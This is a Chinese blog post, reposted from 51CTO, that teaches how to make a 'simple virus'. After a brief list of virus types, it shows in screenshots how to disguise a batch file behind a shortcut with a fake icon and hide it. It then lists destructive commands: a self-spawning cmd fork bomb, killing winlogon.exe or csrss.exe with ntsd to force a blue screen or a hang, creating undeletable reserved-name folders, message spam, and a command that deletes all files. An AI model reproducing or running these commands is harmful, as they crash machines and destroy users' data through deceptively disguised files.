简单病毒文件制作

简介:

一个病毒是一段程序,它通过附加到文件上或替换文件来感染用户的计算机,良性病毒只会消耗掉一些内存、CPU、磁盘空间
文件病毒:它把自己附加到可执行文件上
开机性病毒:它把病毒代码放在计算机的磁盘启动扇区上,所以每次计算机被启动时就执行该病毒
主引导记录病毒:它感染磁盘的第一个物理扇区
复合型病毒:它通常具有多种感染方法
宏病毒:它把自己附加到文档或模板的宏中


本次创建批处理

第一步、新建文件文档txt

wKioL1lbRGfRFm8WAACspyWlFDQ281.jpg

第二步、更改文件后缀

wKiom1lbRHTBmG1jAAOVtSABe8Q442.jpg

wKioL1lbRHjjkmUQAAMciD8h7gk653.jpg

第三步、创建快捷方式

wKioL1lbTBOQJ1-WAAOEFwVQi0I671.jpg

第四步、快捷方式添加图标

wKioL1lbRPyA3_m2AANVgdzONTc474.jpg

wKiom1lbRQmxiHWoAAOPXQdMOws236.jpg

wKioL1lbRRGTkUwUAANYZ0RdQok290.jpg

第五步、重命名

wKiom1lbTWvwxEPPAAOO3W4zEVs386.jpg

第六步、隐藏批处理文件

wKiom1lbRvmzFFhAAAOLC0H-dKY665.jpg


wKioL1lbSYCw30eJAANEdvi9NVE695.jpg

1、重复执行某条命令直至死机的批处理代码:
start cmd
  %0
2、复制一个文件的磁盘的每个子文件夹当中:
for /r /d %a in (*)  do copy test.txt "%a" /y
3、不停地执行同一条命令:
for /l %a in (1,0,2) do net send 192.168.1.1 "×××来了!"
4、死机,蓝屏
ntsd -c q -pn winlogon.exe(蓝屏重启)

ntsd -c q -pn csrss.exe(死机)

5、创建无法删除的特殊名字文件夹:
    md \\.\c:\con
    md \\.\c:\aux
6、创建无法双击打开无法删除的另类文件夹:
    md test..\
    rd test..\ /s /d
7、注销
rundll32.exe user32.dll LockWorkStation

8、删除磁盘所有文件:del * /a /q /f
9、创建名字为空的文件夹:md (按住ALT键,在小键盘上按2,5,5,然后松开Alt,回车)










本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1944427,如需转载请自行联系原作者
目录
相关文章
|
3月前
|
安全 Shell
2021Kali -- 木马免杀制作
2021Kali -- 木马免杀制作
35 1
|
安全 Windows
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
129 0
7-Zip 曝出零日安全漏洞!通过“模仿文件扩展名”向攻击者提供管理员权限
|
SQL 监控 安全
网站木马清除对被植入木马 导致被西部数码关闭网站的解决办法
前段时间有一客户的网站打不开了,打开网站被提示什么:抱歉,主机因存在有害信息逾期未处理被关闭 Sorry, the site now can not be accessed. 客户第一时间找到我们SINE安全寻求解决方案,我们根据客户的反馈,进行详细的记录,分析问题,找到了被系统自动阻断拦截的原因,客户网站用的是西部数码主机,再一个主要的原因是,客户网站被篡改并上传了一些有害,违法的内容信息,导致被西部数码的有害信息监测处置系统监控到,立即进行了拦截,阻断处理。关于这个安全问题,我们记录下了整个的处理过程。
210 0
网站木马清除对被植入木马 导致被西部数码关闭网站的解决办法
|
C# Windows
exe文件,后门免杀的制作学习笔记
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396307 引用原文!! 注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。
1472 0